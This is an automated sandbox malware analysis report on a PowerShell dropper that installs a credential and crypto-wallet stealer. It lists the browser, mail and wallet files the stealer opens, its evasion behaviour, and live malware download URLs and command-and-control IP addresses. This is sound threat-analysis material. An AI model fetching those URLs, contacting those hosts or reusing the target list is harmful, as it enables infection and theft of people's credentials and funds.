              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation TimeZoneKeyNameJump to behavior
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067FCE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_0067FCE5
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067C9DB LookupAccountNameW,GetLastError,malloc,LookupAccountNameW,GetLastError,free,3_2_0067C9DB
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A712E3C _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,10_2_00007FF75A712E3C
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0066B4F0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,GetVersionExW,#1202,#538,#800,#6112,#2613,#384,#2089,#1197,#520,#986,#4604,#1197,#5977,3_2_0066B4F0
              Source: C:\Windows\Temp\Launcher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: xdnfl52f.civ.exe PID: 7512, type: MEMORYSTR
              Source: Yara matchFile source: 10.0.xdnfl52f.civ.exe.7ff75a670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.xdnfl52f.civ.exe.7ff75a670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xdnfl52f.civ.exe PID: 7512, type: MEMORYSTR
              Source: Yara matchFile source: C:\Windows\Temp\xdnfl52f.civ.exe, type: DROPPED
              Source: xdnfl52f.civ.exe, 0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum\wallets
              Source: xdnfl52f.civ.exe, 0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectronCash\config
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268212538.000001D9D075F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ny1aaXAgMjMuMDEgKHg2NCkgWzIzLjAxXQpNb3ppbGxhIEZpcmVmb3ggKHg2NCBlbi1VUykgWzExOC4wLjFdCk1vemlsbGEgTWFpbnRlbmFuY2UgU2VydmljZSBbMTE4LjAuMV0KTWljcm9zb2Z0IE9mZmljZSBQcm9mZXNzaW9uYWwgUGx1cyAyMDE5IC0gZW4tdXMgWzE2LjAuMTY4MjcuMjAxMzBdCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMjIgWDY0IEFkZGl0aW9uYWwgUnVudGltZSAtIDE0LjM2LjMyNTMyIFsxNC4zNi4zMjUzMl0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBMaWNlbnNpbmcgQ29tcG9uZW50IFsxNi4wLjE2ODI3LjIwMTMwXQpPZmZpY2UgMTYgQ2xpY2stdG8tUnVuIEV4dGVuc2liaWxpdHkgQ29tcG9uZW50IDY0LWJpdCBSZWdpc3RyYXRpb24gWzE2LjAuMTY4MjcuMjAwNTZdCkFkb2JlIEFjcm9iYXQgKDY0LWJpdCkgWzIzLjAwNi4yMDMyMF0KTWljcm9zb2Z0IFZpc3VhbCBDKysgMjAyMiBYNjQgTWluaW11bSBSdW50aW1lIC0gMTQuMzYuMzI1MzIgWzE0LjM2LjMyNTMyXQpHb29nbGUgQ2hyb21lIFsxMTcuMC41OTM4LjEzMl0KTWljcm9zb2Z0IEVkZ2UgWzExNy4wLjIwNDUuNDddCk1pY3Jvc29mdCBFZGdlIFVwZGF0ZSBbMS4zLjE3Ny4xMV0KTWljcm9zb2Z0IEVkZ2UgV2ViVmlldzIgUnVudGltZSBbMTE3LjAuMjA0NS40N10KSmF2YSBBdXRvIFVwZGF0ZXIgWzIuOC4zODEuOV0KSmF2YSA4IFVwZGF0ZSAzODEgWzguMC4zODEwLjldCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMTUtMjAyMiBSZWRpc3RyaWJ1dGFibGUgKHg2NCkgLSAxNC4zNi4zMjUzMiBbMTQuMzYuMzI1MzIuMF0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBFeHRlbnNpYmlsaXR5IENvbXBvbmVudCBbMTYuMC4xNjgyNy4yMDEzMF0K
              Source: xdnfl52f.civ.exe, 0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus\exodus.wallet
              Source: xdnfl52f.civ.exe, 0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum\keystore
              Source: powershell.exe, 00000000.00000002.2143861536.00007FF849110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
              Source: C:\Windows\Temp\xdnfl52f.civ.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCKJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: xdnfl52f.civ.exe PID: 7512, type: MEMORYSTR
              Source: Yara matchFile source: 10.0.xdnfl52f.civ.exe.7ff75a670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.xdnfl52f.civ.exe.7ff75a670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xdnfl52f.civ.exe PID: 7512, type: MEMORYSTR
              Source: Yara matchFile source: C:\Windows\Temp\xdnfl52f.civ.exe, type: DROPPED
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_00674899 #1662,#540,lstrcpyW,CreateBindCtx,MkParseDisplayName,#2644,#2810,#800,lstrlenW,#2810,#2644,#800,3_2_00674899
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Native API
              1
              DLL Side-Loading
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              12
              System Time Discovery
              Remote Services1
              Archive Collected Data
              12
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              Account Discovery
              Remote Desktop Protocol2
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              Security Account Manager4
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Screen Capture
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
              Process Injection
              1
              DLL Side-Loading
              NTDS36
              System Information Discovery
              Distributed Component Object Model1
              Email Collection
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets131
              Security Software Discovery
              SSH2
              Clipboard Data
              23
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync2
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578093 Sample: script.ps1 Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 40 api.ipify.org 2->40 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Antivirus detection for URL or domain 2->52 54 9 other signatures 2->54 9 powershell.exe 14 21 2->9         started        signatures3 process4 dnsIp5 46 147.45.47.15, 49704, 49705, 80 FREE-NET-ASFREEnetEU Russian Federation 9->46 36 C:\Windows\Temp\iviewers.dll, PE32 9->36 dropped 38 C:\Windows\Temp\Launcher.exe, PE32 9->38 dropped 68 Found many strings related to Crypto-Wallets (likely being stolen) 9->68 70 Powershell drops PE file 9->70 14 Launcher.exe 2 9->14         started        17 conhost.exe 9->17         started        file6 signatures7 process8 signatures9 72 Bypasses PowerShell execution policy 14->72 74 Adds a directory exclusion to Windows Defender 14->74 19 xdnfl52f.civ.exe 6 14->19         started        23 powershell.exe 23 14->23         started        25 powershell.exe 15 16 14->25         started        process10 dnsIp11 42 193.3.19.151, 15666, 49709 ARNES-NETAcademicandResearchNetworkofSloveniaSI Denmark 19->42 44 api.ipify.org 104.26.12.205, 443, 49710 CLOUDFLARENETUS United States 19->44 56 Multi AV Scanner detection for dropped file 19->56 58 Tries to steal Mail credentials (via file / registry access) 19->58 60 Machine Learning detection for dropped file 19->60 66 3 other signatures 19->66 62 Loading BitLocker PowerShell Module 23->62 64 Powershell drops PE file 23->64 28 WmiPrvSE.exe 23->28         started        30 conhost.exe 23->30         started        34 C:\Windows\Temp\xdnfl52f.civ.exe, PE32+ 25->34 dropped 32 conhost.exe 25->32         started        file12 signatures13 process14

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              script.ps113%VirustotalBrowse
              script.ps18%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Windows\Temp\xdnfl52f.civ.exe100%Joe Sandbox ML
              C:\Windows\Temp\Launcher.exe0%ReversingLabs
              C:\Windows\Temp\iviewers.dll26%ReversingLabsWin32.Infostealer.Tinba
              C:\Windows\Temp\xdnfl52f.civ.exe83%ReversingLabsWin64.Trojan.MeduzaStealer
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://ns.a.0/sTy0%Avira URL Cloudsafe
              http://147.45.47.15/duschno.exe100%Avira URL Cloudmalware
              http://ns.adobe.hotosh0%Avira URL Cloudsafe
              http://147.45.47.15/Launcher.exe100%Avira URL Cloudmalware
              https://api.ipify.org2O0%Avira URL Cloudsafe
              http://147.45.47.15/iviewers.dll100%Avira URL Cloudmalware
              http://147.45.47.150%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              api.ipify.org
              104.26.12.205
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://api.ipify.org/false
                  high
                  http://147.45.47.15/duschno.exetrue
                  • Avira URL Cloud: malware
                  unknown
                  http://147.45.47.15/iviewers.dlltrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://ns.adobe.hotoshxdnfl52f.civ.exe, 0000000A.00000003.2481151975.000001D9D30D4000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2257752558.000001D9D30C1000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2481030999.000001D9D30D0000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2481002391.000001D9D30D0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2130097419.00000219A7525000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2130097419.00000219A73E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101966913.0000021998AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2153214302.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://ns.a.0/sTyxdnfl52f.civ.exe, 0000000A.00000003.2481151975.000001D9D30D4000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2257752558.000001D9D30C1000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2481030999.000001D9D30D0000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2481002391.000001D9D30D0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2133704244.00000000050C6000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2133704244.00000000050C6000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4exdnfl52f.civ.exe, 0000000A.00000003.2285551989.000001D9D3380000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2133704244.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2159379282.0000000007AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://go.micropowershell.exe, 00000000.00000002.2101966913.0000021997FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.amazon.com/?tag=admarketxdnfl52f.civ.exe, 0000000A.00000003.2285551989.000001D9D3380000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYixdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000004.00000002.2153214302.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/Iconpowershell.exe, 00000004.00000002.2153214302.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.microsoft.powershell.exe, 00000000.00000002.2138728163.00000219AF7AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaxdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D3350000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brxdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2133704244.00000000050C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://147.45.47.15/Launcher.exepowershell.exe, 00000000.00000002.2101966913.00000219975A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101966913.0000021998973000.00000004.00000800.00020000.00000000.sdmp, script.ps1false
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://api.ipify.org2Oxdnfl52f.civ.exe, 0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgxdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgxdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D3350000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2133704244.00000000050C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/powershell.exe, 00000004.00000002.2153214302.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2130097419.00000219A7525000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2130097419.00000219A73E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101966913.0000021998AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2153214302.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLxdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.bestbuy.com/site/electronics/top-deals/xdnfl52f.civ.exe, 0000000A.00000003.2285551989.000001D9D3380000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refxdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pscore6lBjqpowershell.exe, 00000004.00000002.2133704244.0000000004F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://147.45.47.15powershell.exe, 00000000.00000002.2101966913.0000021997FA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101966913.0000021998973000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D3350000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.2101966913.0000021997371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.mozilla.orgxdnfl52f.civ.exe, 0000000A.00000003.2284749758.000001D9D26E0000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D28EB000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2274061388.000001D9D256E000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D28F3000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284749758.000001D9D26E8000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284883431.000001D9D33F2000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D286C000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D2874000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32D8000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32D0000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284883431.000001D9D33FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2101966913.0000021997371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2133704244.0000000004F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.26.12.205
                                                                          api.ipify.orgUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          147.45.47.15
                                                                          unknownRussian Federation
                                                                          2895FREE-NET-ASFREEnetEUtrue
                                                                          193.3.19.151
                                                                          unknownDenmark
                                                                          2107ARNES-NETAcademicandResearchNetworkofSloveniaSItrue
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1578093
                                                                          Start date and time:2024-12-19 08:51:46 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 7m 4s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:12
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:script.ps1
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winPS1@13/15@1/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 50%
                                                                          HCA Information:
                                                                          • Successful, ratio: 99%
                                                                          • Number of executed functions: 198
                                                                          • Number of non-executed functions: 175
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .ps1
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target powershell.exe, PID 4164 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 6152 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          02:52:38API Interceptor84x Sleep call for process: powershell.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.26.12.205jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                                          • api.ipify.org/?format=text
                                                                          xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                                                          • api.ipify.org/
                                                                          GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                          • api.ipify.org/
                                                                          8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                                          • api.ipify.org/
                                                                          Simple2.exeGet hashmaliciousUnknownBrowse
                                                                          • api.ipify.org/
                                                                          Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                          • api.ipify.org/
